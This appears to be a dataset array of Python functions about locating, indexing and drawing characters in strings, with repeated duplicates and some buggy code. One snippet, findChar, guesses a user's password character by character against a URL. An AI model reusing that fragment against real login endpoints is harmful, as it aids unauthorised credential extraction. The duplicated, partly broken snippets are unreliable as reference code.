[ "def inside_char(self, char, marker, tracker, i):\n if char == marker[0]:\n tracker.append(i)\n elif char == marker[1]:\n try:\n tracker.pop()\n except IndexError:\n pass\n return tracker", "def _charToIndex(self,ch): \n return self.char_dict[ch]", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def _get_char(self):\r\n self._i += 1\r\n if self._i < len(self._text):\r\n self._char = self._text[self._i]\r\n else:\r\n self._char = -1", "def index(xy):\n if len(xy) != 2:\n return 'Not a valid string'\n\n with open('ch.txt', encoding=\"utf-8\") as file:\n chars = file.read()\n print(chars)\n for i in range(len(chars)):\n if chars.contains(xy[0]): \n return 'Yeah'", "def locate_char(c, s):\n return [i for i, l in enumerate(s) if l == c]", "def FindChar(self, char, repeat=1, reverse=False, extra_offset=0):\n text, pos = self.GetCurLine()\n oldpos = pos\n if not reverse:\n # search forward\n for i in range(repeat):\n pos = text.find(char, pos+1)\n if pos == -1:\n return\n else:\n # search backward\n for i in range(repeat):\n pos = text.rfind(char, 0, pos)\n if pos == -1:\n return\n\n newpos = pos + extra_offset\n if newpos in range(len(text)):\n self.MoveCaretPos(newpos - oldpos)", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findChar(self, position, spaceLength ):\n leer=0 ## numeator of empty column\n Queue=[] ##this will help in serching for neighbours of pixels\n PiksList=[] ##list of balck piksels, of with consist the charakter\n length, high = self.getSize()\n \n while (position < length and self.vLineHistogram(position)==0): #serching for a first not empty line, for given position\n position+=1\n leer+=1\n if position == length: ## check if it is Space or it is End of line\n return position, \"Enter\", 0\n elif leer>=spaceLength:\n return position, \"Space\", 0\n else:\n for i in range(0,high): ##extracting all black pixels from this line\n if self.getPixel(position, i)<128:\n Queue.append((position, i))\n PiksList.append((position, i))\n\n while len(Queue)>0:\n Piksel=Queue.pop(0) ##geting firs element from Queue\n neighbourhood=[(Piksel[0]-1, Piksel[1]+1),(Piksel[0]-1, Piksel[1]),(Piksel[0]-1, Piksel[1]-1),(Piksel[0], Piksel[1]+1),(Piksel[0], Piksel[1]-1),(Piksel[0]+1, Piksel[1]+1),(Piksel[0]+1, Piksel[1]),(Piksel[0]+1, Piksel[1]-1)]\n ##to co wyzej to lista współrzędnych sąsiadów Piksela\n\n for neighbour in neighbourhood: ##cheking neighbourhood of each pixel\n if not(neighbour in PiksList) and (neighbour[0] in range(0,length)) and (neighbour[1] in range(0,high)) and self.getPixel(neighbour[0],neighbour[1])==0:\n Queue.append(neighbour)\n PiksList.append(neighbour)\n \n PiksList.sort() ##sorts list with number of column\n\n \n PiksList=self.addHigherPiks(PiksList) ##adds all piksel over finden pixels\n PiksList.sort()\n position1,High1=PiksList[0]\n position2,High2=PiksList[len(PiksList)-1] ## geting number of smalest and biggest column in group\n charLength=position2-position1\n if len(PiksList)>5: ##checkin if there are more then 5 piksels in group to eliminate case, when there are single pixels not eliminated by initial fomating\n if charLength<high: ##check if the length of finden group of pixels isn't bigger then length of tile\n newPosition= position1+(charLength/2) ##new position in the center of finden char to eliminate case, when one char is over the second\n Char=CharFrame(high,high) ##create new CrarFrame object\n \n for el in PiksList: ##making all pixels in PiksList black in ChatFrame object and white in self(LineFrame object)\n Char.putPixel(el[0]-position1,el[1])\n self.makeWhite(el[0],el[1])\n \n Char.reScale(30,30) #scaling CharFrame to the ening size\n \n return newPosition, Char, charLength/2\n\n else: ##length of goup of pixels is too big\n PiksList, Char = reconChar(PiksList,high) ## finding where to divide group of pixels\n for Piks in PiksList:\n self.makeWhite(Piks[0],Piks[1])\n position1,High1=PiksList[0]\n position2,High2=PiksList[len(PiksList)-1] ## geting number of smalest and biggest column in group\n charLength=position2-position1\n newPosition= position1+(charLength/2) ##new position in the center of finden char to eliminate case, when one char is over the second\n return newPosition, Char, charLength/2\n else: ##if there is less then 5 pixels in group\n for el in PiksList: ##making all pixels in PiksList white in self(LineFrame object)\n self.makeWhite(el[0],el[1])\n newPosition= position1+(charLength/2)\n return newPosition, \"None\", charLength/2", "def match(self, ch):\n if ch == self.string[self.idx]:\n # sys.stderr.write(\"{} found at pos {}\\n\".format(ch, self.idx))\n self.idx += 1\n if self.idx == self.slen:\n sys.stdout.write(self.func(self.string))\n self.idx = 0\n self._status = DONE\n else:\n self._status = STORING\n return True\n else:\n if self.idx > 0:\n sys.stdout.write(self.string[0:self.idx])\n self.idx = 0\n self._status = NOMATCH\n return False", "def _get_charindex(self, x, y):\r\n verts = self.shapes[0].buf[0].vertices\r\n x = x - self.x + verts[2][0]\r\n y = y - self.y + verts[0][1]\r\n nv = len(verts)\r\n for i in range(0, nv, 4):\r\n vtr = verts[i] # top right\r\n vbl = verts[i + 2] # bottom left\r\n if x >= vbl[0] and x < vtr[0] and y >= vbl[1] and y < vtr[1]:\r\n i = int(i / 4)\r\n c_i = self.c_lookup[i]\r\n if c_i == (len(self.txt) - 1) or self.c_lookup[i + 1] > c_i + 1:\r\n if (vtr[0] - x) < (x - vbl[0]):\r\n c_i += 1\r\n return c_i\r\n return len(self.txt)", "def alphabet_position(char):\n if type(char) != type(''):\n return -1\n if len(char) != 1:\n return -1\n if char.isalpha():\n return lowerLetters.find(char.lower())\n return -1", "def find(strng, ch):\n ix = 0\n while ix < len(strng):\n if strng[ix] == ch:\n return ix\n ix += 1\n return -1", "def _insChar(self, char, pos, color):\n char, vertices, glyph = self._extractGlyph(char, glm.vec4(color))\n if not self.text:\n off, kern = self._updateMetric(pos, char)\n if char in self.NO_GLYPH_CHARS:\n self.colors.insert(pos, [char, None])\n else:\n vertices['vtx'] += off + glyph['offset']\n self.allVertices = np.hstack(vertices)\n self.allIndices = self._baseInd\n self.colors.insert(pos, [char, color])\n self.text += char\n else:\n self.logger.debug(\"Inserting %r at %d\" % (char, pos))\n nonGlyph = countInSet(self.text[:pos], self.NO_GLYPH_CHARS)\n # Arrange vertices\n if pos < len(self.text):\n self.allVertices = self.allVertices[:(pos - nonGlyph) * 4]\n self.allIndices = self.allIndices[:pos - nonGlyph]\n\n # Set the metric\n off, kern = self._updateMetric(pos, char)\n if char in self.NO_GLYPH_CHARS:\n color = None\n else:\n vertices['vtx'] += off + kern + glyph['offset']\n if self.allVertices is None:\n self.allVertices = np.hstack(vertices)\n else:\n self.allVertices = np.append(self.allVertices, vertices)\n if self.allIndices is None:\n self.allIndices = self._baseInd\n else:\n self.allIndices = np.vstack((self.allIndices,\n self._baseInd + (pos - nonGlyph) * 4))\n\n self.colors.insert(pos, [char, color])\n if pos < len(self.text):\n self.text = self.text[:pos] + char + self.text[pos:]\n self._updateGlyphs(pos, char)\n else:\n self.text += char", "def putchar(self, col, row, char, color=GREEN):\n for j in range(FONT_HEIGHT - 5):\n v = self.font[ord(char)][3 + j]\n for i in range(FONT_WIDTH):\n if v & (1 << (7 - i)):\n self.putpixel(col + i, row + j, color)\n else:\n self.putpixel(col + i, row + j, BLACK)", "def getchar(words,pos):\n\n\tif pos<0 or pos>=len(words): return None\n\n\treturn words[pos]", "def print_a_char(i):\n\n if i == len(myString):\n # base case: end of string, just return\n print(\"debuggin base case ... now i = \" + str(i))\n return\n else:\n print(\"debuggin recursion ... now i = \" + str(i))\n # recursive case:\n # print char at current index\n # increment index,\n # call itself recursively\n print( myString[i] )\n i = i + 1\n print_a_char(i)\n \n # end of function print_a_char()", "def character(index):\n # Default: act as a dummy.\n return index", "def find_letter(self,letter):\n for i in range(0,len(self._word)):\n if self._word[i] == letter:\n self.new_string[i] = letter\n\n if letter not in self._word:\n self.letters_wrong += 1\n\n self.selected_letters += letter + ', '\n return self.print_new_word(self.new_string)", "def letterToIndex(letter):\n if letter not in all_letters:\n letter = remove_tone_marks(letter)\n\n return all_letters.find(letter) + 1", "def char(self, aIndex, char):\n o = ord(char)\n c = -1\n # space\n if o == 32:\n c = 16\n # dash\n if o == 45:\n c = 17\n # uppercase A-F\n if 65 <= o <= 70:\n c = o - 55\n # lowercase a-f\n if 97 <= o <= 102:\n c = o - 87\n # 0-9\n if 48 <= o <= 57:\n c = o - 48\n\n self.digit(aIndex, c)", "def _get_index(self, character):\n OFFSET = 65 # ascii value of 'A' since the first element should be 'A'\n index = ord(character) - OFFSET\n return index", "def check_char(self, char: str) -> None:\n while len(char) > 1:\n char = input(\"Enter only a char -> \")\n char = char.lower()\n if char in self.word:\n indexes = []\n tmp_word = list(self.word)\n while char in tmp_word:\n index = tmp_word.index(char)\n indexes.append(index)\n tmp_word[index] = \"\"\n for i in indexes:\n self.word2[i] = char\n else:\n self.errors += 1\n print(f\"This char isn't in the word -> +1 Error {self.errors}/{self.attempts}\")", "def index_of_x(word: str, position=0):\n\tif word[position] == 'x': \n\t\treturn position \n\telse:\n\t\treturn index_of_x(word, position + 1)", "def alphabet_position(letter):\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n pos = 0\n for ltr in alphabet:\n if ltr == letter.lower():\n return pos\n pos += 1\n return pos", "def find(self,s, ch):\r\n return [i for i, ltr in enumerate(s) if ltr == ch]", "def test_string_insertion(a_string, a_character):\n for position in range(0, len(a_string)+1):\n print a_string[:position] + a_character + a_string[position:]", "def Appliquer(auto, char):\n\tetat = 0\n\ti=0\n\tfinal = -1\n\twhile i<len(char) and etat != -1:\n\t\t#~ print char[i], etat, auto.delta[etat][ord(char[i])]\n\t\tetat = auto.delta[etat][ord(char[i])]\n\t\tif etat in auto.F:\n\t\t\tfinal = i\n\t\ti+=1\n\t\n\treturn final", "def research_pos(self, map_list, character): \n list_pos = []\n for y in range(15): \n for x, c in enumerate(map_list[y]):\n if character in c and c == character:\n list_pos.append((x*50, y*50)) \n return list_pos", "def compute_escape(pos):\n z = 0 + 0j;\n for i in range(ESCAPE):\n z = z ** 2 + pos\n if abs(z) > 2:\n break\n return i", "def alphabet_position(letter):\n\n alphabet='abcdefghijklmnopqrstuvwxyz'\n ALPHABET='ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n if letter.isupper() == True:\n for x in ALPHABET:\n if letter == x:\n position = ALPHABET.index(x)\n return position\n\n else:\n for x in alphabet:\n if letter == x:\n position = alphabet.index(x)\n return position", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def cons(self, i):\n\t\tif self.b[i] == 'a' or self.b[i] == 'e' or self.b[i] == 'i' or self.b[i] == 'o' or self.b[i] == 'u':\n\t\t\treturn 0\n\t\tif self.b[i] == 'y':\n\t\t\tif i == self.k0:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\treturn (not self.cons(i - 1))\n\t\treturn 1", "def write_char(self, char, token, string_index=None,\n set_cursor_position=False, z_index=False):\n assert len(char) == 1\n\n char_obj = Char(char, token, z_index)\n char_width = char_obj.get_width()\n\n # In case there is no more place left at this line, go first to the\n # following line. (Also in case of double-width characters.)\n if self._x + char_width > self.size.columns:\n self._y += 1\n self._x = 0\n\n insert_pos = self._y, self._x # XXX: make a Point of this?\n\n if string_index is not None:\n self._cursor_mappings[string_index] = insert_pos\n\n if set_cursor_position:\n self.cursor_position = Point(y=self._y, x=self._x)\n\n # Insertion of newline\n if char == '\\n':\n self._y += 1\n self._x = 0\n self._line_number += 1\n\n # Insertion of a 'visible' character.\n else:\n if char_obj.z_index >= self._buffer[self._y][self._x].z_index:\n self._buffer[self._y][self._x] = char_obj\n\n # When we have a double width character, store this byte in the\n # second cell. So that if this character gets deleted afterwarsd,\n # the ``output_screen_diff`` will notice that this byte is also\n # gone and redraw both cells.\n if char_width > 1:\n self._buffer[self._y][self._x+1] = Char(six.unichr(0))\n\n # Move position\n self._x += char_width\n\n return insert_pos", "def check_direction(self,word,pos,d):\r\n self.word_found = [self.word[0]] #this is a list of the characters found in the word in the particular direction\r\n self.current_pos = pos #the position you start at - i.e the first character of the word\r\n self.pos_checked = [pos] #list containing all the positions we have checked so far\r\n \r\n \r\n while self.check_match(self.word_found,self.word):\r\n check = 0\r\n #check if length of word found is same is length of the word yoou are searching for\r\n if (len(self.word) == len(self.word_found)):\r\n \r\n #correct word has been found !\r\n #print('word found!')\r\n \r\n #change these characters to red to highlight the word\r\n #print(self.word_found)\r\n \r\n self.highlight_word(self.pos_checked)\r\n \r\n return True\r\n \r\n \r\n else:\r\n #word isnt correct length, move to next coordinate and try again\r\n self.current_pos = [self.current_pos[0] + d[0], self.current_pos[1] + d[1]] \r\n #current_pos = [initial x pos + x indices of direction,\r\n self.pos_checked.append(self.current_pos) \r\n #print(self.current_pos) \r\n # initial y pos + y indices of direction]\r\n \r\n if self.valid_coordinate(self.current_pos[0],self.current_pos[1]):\r\n self.word_found.append(self.wordsearch[self.current_pos[0]][self.current_pos[1]]) \r\n #add new character to word found\r\n else:\r\n return #word not found - out of worsearch range\r", "def indexOf(self, p_str): # real signature unknown; restored from __doc__\n return 0", "def indexOf(self, p_str): # real signature unknown; restored from __doc__\n return 0", "def return_index(character: str) -> int:\n if character.islower():\n return ord(character) - ord(\"a\")\n else:\n return ord(character) - ord(\"A\")", "def display_position(game_board: list, character: list):\n print(\"You are currently here:\")\n for position in game_board:\n if position[0] == character[0] and position[1] == character[1]:\n print('C', end=\" \")\n else:\n print(\"*\", end=\" \")\n if position[1] == game_board[-1][1]:\n print(\"\")", "def f_index(self, substring, direction=[]):\n substr = self.value(substring)\n if \"back\" in direction:\n pos = self._val.rfind(substr)\n else:\n pos = self._val.find(substr)\n\n return pos + 1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def _put(self, char: str, index: int = 0) -> None:\n # pylint: disable=too-many-return-statements\n if not 0 <= index < self._chars:\n return\n index = self._adjusted_index(index)\n if self._chardict and char in self._chardict:\n self._set_buffer(index, self._chardict[char])\n return\n char = char.lower()\n if char == \".\":\n self._set_buffer(index, self._get_buffer(index) | 0b10000000)\n return\n if char in \"abcdefghijklmnopqrstuvwxy\":\n character = ord(char) - 97 + 10\n elif char == \"-\":\n character = 36\n elif char in \"0123456789\":\n character = ord(char) - 48\n elif char == \" \":\n self._set_buffer(index, 0x00)\n return\n elif char == \":\":\n self._set_buffer(4, 0x02)\n return\n elif char == \";\":\n self._set_buffer(4, 0x00)\n return\n elif char in \"lL\":\n self._set_buffer(index, 0b00111000)\n return\n elif char in \"oO\":\n self._set_buffer(index, 0b00111111)\n return\n else:\n return\n self._set_buffer(index, NUMBERS[character])", "def find(string:str, char:str) -> List[int]:\n return [i for i, ltr in enumerate(string) if ltr == char]", "def simple(self, string):\n\n temp = self\n i = 0\n while temp != 0:\n if string[i] < temp.ch:\n temp = temp.left\n elif string[i] > temp.ch:\n temp = temp.right\n else:\n i = i + 1\n if i == len(string):\n return temp.flag\n temp = temp.center\n\n return 0", "def _get_pos_from_key(key, char):\n return [i+1 for i, c in enumerate(key) if c == char]", "def display_board(board: list, character: list):\n for index in range(len(board)):\n for index_two in range(len(board[index])):\n current_position = [index, index_two]\n if current_position == character:\n if index_two == len(board[index]) - 1:\n print('c')\n else:\n print('c', end=\" \")\n else:\n if index_two == len(board[index]) - 1:\n print('x')\n else:\n print('x', end=\" \")", "def replace_char_candidate(self, char):\n for couple in self.char_couples:\n for i in range(2):\n if couple[i] == char:\n if i == 0:\n return couple[1]\n else:\n return couple[0]", "def find_letter_in_dics(self,letter):\r\n if str.isupper(letter)==True and letter not in self.special_letters_dic and letter not in self.special_characters_dic: #taken from above\r\n position=self.general_upper_word_list[letter]\r\n elif str.islower(letter)==True and letter not in self.special_letters_dic and letter not in self.special_characters_dic:\r\n position=self.general_lower_word_list[letter]\r\n elif self.special_characters_dic!=None and letter in self.special_characters_dic:\r\n position=self.special_characters_dic[letter]\r\n elif letter in self.special_letters_dic:\r\n position=self.special_letters_dic[letter]\r\n elif letter in self.general_numbers_dic:\r\n position=self.general_numbers_dic[letter]\r\n return position", "def map_char(self, char):\n for key, pattern in self.char_map.items():\n if char in pattern:\n return key\n return 'U'", "def cvc(self, i):\n\t\tif i < (self.k0 + 2) or not self.cons(i) or self.cons(i-1) or not self.cons(i-2):\n\t\t\treturn 0\n\t\tch = self.b[i]\n\t\tif ch == 'w' or ch == 'x' or ch == 'y':\n\t\t\treturn 0\n\t\treturn 1", "def isIceAct(string, pos):\n return string == 0 and pos == 1", "def find_word(self,word):\r\n self.start_pos = []\r\n #check each row\r\n for i in range(0,len(self.wordsearch)):\r\n #check each column\r\n for j in range(0, len(self.wordsearch[i])):\r\n #find all coordinates which have the first letter of the word and store them\r\n if self.wordsearch[i][j] == self.word[0]:\r\n self.start_pos.append([i,j])\r\n \r\n \r\n #print(count)\r\n for pos in self.start_pos:\r\n if self.check_start(self.word, pos):\r\n \r\n return", "def fn(ss):\n i = cnt = 0\n for ch in s: \n if ss[i] == ch: \n i += 1\n if i == len(ss): \n if (cnt := cnt + 1) == k: return True \n i = 0\n return False", "def write_highlighted_at_pos(self, y, x, data, z_index=0):\n for token, text in data:\n for c in text:\n char_obj = Char(c, token, z_index)\n self.write_at_pos(y, x, char_obj)\n x += char_obj.get_width()", "def _findExMark(self):\n c_i = 0\n while c_i < len(self.c) and self.c[c_i] != '!':\n c_i += 1\n\n if c_i+1 < len(self.c):\n iRet = self.c[c_i+1:]\n self.code = self.c[:c_i]\n return iRet\n\n return ''", "def next_char(keys, index):\n backspaces = 0\n\n while index >= 0:\n if keys[index] == \"<\":\n backspaces += 1\n else:\n if backspaces == 0:\n return index\n backspaces -= 1\n index -= 1\n\n return -1", "def search(self, word):\n pointer = self.tries\n for i in range(len(word)):\n ascii = ord(word[i]) - ord('a')\n if pointer[ascii] == None:\n return False\n pointer = pointer[ascii]\n if word in pointer[26:]:\n return True\n else:\n return False", "def check_match(self, word_found,word): \r\n self.count = 0\r\n for char in self.word_found:\r\n if char != self.word[self.count]:\r\n return False\r\n self.count +=1\r\n #print(self.count)\r\n \r\n return True", "def chars_match (found, word):\n index = 0\n for i in found:\n if (i != word[index]):\n return False\n index += 1\n return True", "def character(x):\n if (x==\"a\"or x==\"A\"or x==\"e\"or x==\"E\"or x==\"i\"or x==\"I\"or x==\"o\"or x==\"O\"or x==\"u\"or x==\"U\"):\n return('True')\n else:\n return('False')", "def ctrl_f(self):\n if self.index < len(self.string):\n self.index += 1", "def findall(string,chars):\n nb = len(chars) \n return [ pos for pos, c in enumerate(string)\n if pos + nb <= len(string) and string[pos:pos + nb] == chars]", "def isvalidposition(pdic,iprime,distance):\r\n \r\n # deal with base shifts \r\n distance = distance-2\r\n \r\n istforbidden = 0\r\n for o in range(-distance,distance+2,1):\r\n if (iprime+o in pdic):\r\n # E = end of orf\r\n # S = start of orf\r\n if((pdic[iprime+o]==\"E\") or (pdic[iprime+o]==\"S\")):\r\n if((o >3) or (o <-3)):\r\n pass\r\n else:\r\n istforbidden = 1\r\n break\r\n else:\r\n istforbidden = 1\r\n break\r\n else:\r\n pass\r\n \r\n return(istforbidden)", "def findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def read_until(self, chars):\n\n start_index = self.index\n\n while self.index < self.length and self.xtext[self.index] not in chars:\n self.index += 1\n\n assert self.index < self.length\n\n return self.xtext[start_index:self.index]", "def _put(self, char: str, index: int = 0) -> None:\n if not 0 <= index < self._chars:\n return\n if not 32 <= ord(char) <= 127:\n return\n if char == \".\":\n self._set_buffer(\n self._adjusted_index(index * 2 + 1),\n self._get_buffer(self._adjusted_index(index * 2 + 1)) | 0b01000000,\n )\n return\n character = ord(char) * 2 - 64\n self._set_buffer(self._adjusted_index(index * 2), CHARS[1 + character])\n self._set_buffer(self._adjusted_index(index * 2 + 1), CHARS[character])", "def getCharAtPos(self, row, col):\n return self.maze[row][col]", "def ind_pos(position, ind, current_geno, chr_starts, chr_ends):\n ind_starts = chr_starts[ind]\n ind_ends = chr_ends[ind]\n #print [position, ind, current_geno, ind_starts, ind_ends]\n in_interval = False\n for interval in range(len(ind_starts)):\n if position > int(ind_starts[interval]) and position < int(ind_ends[interval]):\n in_interval = True\n break\n if in_interval:\n return(current_geno)\n else:\n return(\"./.\")", "def compute_revoffset_pos(seq, pos):\n\n cnt = 0 \n for c in seq:\n if c in msa_characters:\n cnt += 1\n return pos - cnt", "def advance(self):\n self.pos += 1\n if self.pos < len(self.text):\n self.current_char = self.text[self.pos]\n else:\n self.current_char = None", "def _put_chr_at(self, char, row, col, color, adjustment_x=.19, adjustment_y=.19):\n self._goto_piece_xy(row, col, adjustment_x, adjustment_y)\n self.pen.color(color)\n self.pen.write(char, font=(\"Courier\", round(self.square_side_size * .7),\n \"normal\"))", "def _current_char(self):\r\n\r\n return self._input_string[self._index]", "def translate(l, a, c):\n try:\n i = int(l[0])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[1].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n try:\n i = int(l[2])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[3].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n return True", "def set_char_at(s, index, c):\n l = list(s)\n l[index] = c\n return ''.join(l)", "def toindex(col, row):\n a2z = 'ABCDEFGHIJLKMNOPQRSTUVWXYZ'\n\n total = 0\n mult = 0\n for char in col:\n total += (a2z.find(char) + (26 * mult))\n mult += 1\n\n return total, row - 1", "def get_bad_char(self, string, size):\n bad_char = [-1] * self.NO_OF_CHARS\n for i in range(size):\n # ord('A') == chr(65)\n bad_char[ord(string[i])] = i\n\n return bad_char", "def loop1(self, move, new_state, i):\n if move == i[0]:\n # analyze another cell\n if new_state.letters[i[1]].isalpha():\n new_state.claim[i[2]] \\\n = new_state.get_current_player_name()[1]\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[3]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[4]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[5]]) \\\n and new_state.claim[i[6]] == \"@\":\n new_state.claim[i[6]] \\\n = new_state.get_current_player_name()[1]\n # analyze the other 4 cells\n count = 0\n for x in [new_state.letters[i[7]],\n new_state.letters[i[8]],\n new_state.letters[i[9]],\n new_state.letters[i[10]]]:\n if new_state.get_current_player_name()[1] == x:\n count += 1\n if count == 2 and new_state.claim[i[11]] == \"@\":\n new_state.claim[i[11]] = \\\n new_state.get_current_player_name()[1]\n new_state.letters = [self.get_current_player_name()[1]\n if i == move else i for i in self.letters]\n return new_state", "def to_index(self, char):\n return ord(char) - ord(\"A\") - 32", "def check(self, text):\n p = self.d\n i = 0\n j = 0\n result = []\n ln = len(text)\n while i + j < ln:\n t = text[i + j].lower()\n # print i,j,hex(ord(t))\n if not (t in p):\n j = 0\n i += 1\n p = self.d\n continue\n p = p[t]\n j += 1\n # print p,i,j\n if chr(11) in p:\n p = self.d\n result.append(text[i:i + j])\n i = i + j\n j = 0\n return result", "def index(self, sub, start=0):\n br = \"([{\"[\")]}\".index(sub)]\n count = 0\n for i in range(start, len(self.string)):\n char = self.string[i]\n if char == br:\n count += 1\n elif char == sub:\n if count > 0:\n count -= 1\n else:\n return i\n raise SyntaxError(\"Bad string\")", "def _get_interleving(self, index):\n try:\n index = self._char_indexes[index - 1]\n except IndexError:\n return \"\"\n s = \"\"\n while True:\n index += 1\n if index in self._char_indexes:\n break\n elif index in self._code_indexes:\n s += self._raw_string[index]\n else:\n break\n return s", "def process_next_char(self): \n self.current_position += 1\n if self.current_position >= len(self.code_input):\n '''End of file since the position is equal to or greater than the input's position'''\n self.current_char = '\\0' #EOF\n print('end of line')\n self.current_char = self.code_input[self.current_position]", "def _updateGlyphs(self, pos, char=None):\n allVertices = []\n allIndices = []\n for k in range(len(self.text) - pos):\n idx = pos + k\n # Metric\n off, kern = self._updateMetric(idx, self.text[idx])\n # Handle special char\n if self.text[idx] in self.NO_GLYPH_CHARS:\n continue\n # Arrange vertices\n vertices = self.extracted[ord(self.text[idx])]['vertices'].copy()\n vertices['rgba'] = glm.vec4(self.colors[idx][1])\n vertices['vtx'] += (off + kern\n + self.extracted[ord(self.text[idx])]['offset'])\n allVertices.append(vertices)\n if char is None:\n head = self.text[:pos] + self.text[pos:idx]\n else:\n head = self.text[:pos + 1] + self.text[pos:idx]\n s = len(head.replace(' ', '').replace('\\n', ''))\n allIndices.append(self._baseInd + 4 * s)\n if len(allVertices) > 0 and len(allIndices) > 0:\n # Arrange vertices indices\n self.allVertices = np.append(self.allVertices,\n np.hstack(allVertices))\n self.allIndices = np.append(self.allIndices,\n np.vstack(allIndices), axis=0)", "def check_symbol(s,next_index,symbol):\n try:\n next_index = jump_over_space(s,next_index)\n if s[next_index:next_index + len(symbol)] == symbol:\n return next_index + len(symbol) # We must ignore the symbol\n except IndexError:\n return False\n else:\n return False", "def last_numeric_char(self, s):\n keep = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '.'}\n i = 0\n not_done = True\n while not_done:\n if s[i] in keep:\n i += 1\n else:\n not_done = False\n\n if i >= len(s):\n not_done = False\n return i", "def _find_index(string):\n if string[0] == 'X':\n return 0\n elif string == 'D':\n return 1\n else:\n return np.where(sym == string)[0][0]", "def loop53(self, move, new_state, i):\n if move == i[0]:\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[1]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[2]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[3]]) \\\n and new_state.claim[i[4]] == \"@\":\n new_state.claim[i[4]] \\\n = new_state.get_current_player_name()[1]\n\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[5]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[6]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[7]]) \\\n and new_state.claim[i[8]] == \"@\":\n new_state.claim[i[8]] \\\n = new_state.get_current_player_name()[1]\n\n # analyze the other 4 cells\n count = 0\n for x in [new_state.letters[i[9]],\n new_state.letters[i[10]],\n new_state.letters[i[11]],\n new_state.letters[i[12]]]:\n if new_state.get_current_player_name()[1] == x:\n count += 1\n if count == 2 and new_state.claim[i[13]] == \"@\":\n new_state.claim[i[13]] = \\\n new_state.get_current_player_name()[1]\n new_state.letters = [self.get_current_player_name()[1]\n if i == move else i for i in self.letters]\n return new_state", "def index(sequence, i):\n try:\n return sequence[i]\n except IndexError:\n return u\"\"", "def step1c(self, word):\r\n\r\n if word.endswith('y'):\r\n result = word.rfind('y')\r\n base = word[:result]\r\n if self.containsVowel(base):\r\n word = base\r\n word += 'i'\r\n return word", "def write_at_pos(self, y, x, char_obj):\n # Add char to buffer\n if x < self.size.columns:\n if char_obj.z_index >= self._buffer[y][x].z_index:\n self._buffer[y][x] = char_obj", "def scol(string, i):\r\n return i - string.rfind('\\n', 0, max(0, i))", "def writechar(self, char: int, /) -> None:" ]
